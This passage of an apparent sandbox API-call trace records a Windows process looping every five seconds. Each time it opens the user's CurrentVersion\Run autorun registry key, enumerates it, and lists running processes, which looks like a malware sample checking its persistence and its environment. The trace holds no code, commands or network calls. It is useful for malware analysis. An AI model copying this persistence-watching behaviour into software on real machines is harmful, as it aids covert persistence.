(ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.165] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.174] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.174] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.174] NtClose (Handle=0x154) returned 0x0 [0184.174] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.175] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.175] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.175] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.177] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.178] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.189] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.190] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.190] NtClose (Handle=0x154) returned 0x0 [0184.190] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.190] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.191] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.191] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.191] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.193] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.193] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.217] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.217] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.217] NtClose (Handle=0x154) returned 0x0 [0184.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.218] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.220] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.221] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.238] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.238] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.238] NtClose (Handle=0x154) returned 0x0 [0184.238] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.239] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.239] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.242] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.252] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.252] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.252] NtClose (Handle=0x154) returned 0x0 [0184.252] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.254] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.257] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.258] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.270] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.270] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.270] NtClose (Handle=0x154) returned 0x0 [0184.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.272] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.274] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.275] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.283] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.283] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.283] NtClose (Handle=0x154) returned 0x0 [0184.283] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.285] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.285] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.287] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.288] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.299] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.299] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.299] NtClose (Handle=0x154) returned 0x0 [0184.299] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.300] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.300] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.303] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.303] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.315] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.315] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.315] NtClose (Handle=0x154) returned 0x0 [0184.315] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.316] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.317] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.317] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.319] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.319] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.331] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.331] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.331] NtClose (Handle=0x154) returned 0x0 [0184.331] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.331] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.332] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.332] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.334] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.335] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.346] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.346] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.346] NtClose (Handle=0x154) returned 0x0 [0184.346] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.347] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.347] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.347] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.348] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.350] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.350] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.361] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.361] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.361] NtClose (Handle=0x154) returned 0x0 [0184.361] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.362] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.362] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.363] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.363] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.365] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.365] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.377] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.377] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.377] NtClose (Handle=0x154) returned 0x0 [0184.377] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.378] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.380] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.381] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.392] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.392] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.393] NtClose (Handle=0x154) returned 0x0 [0184.393] 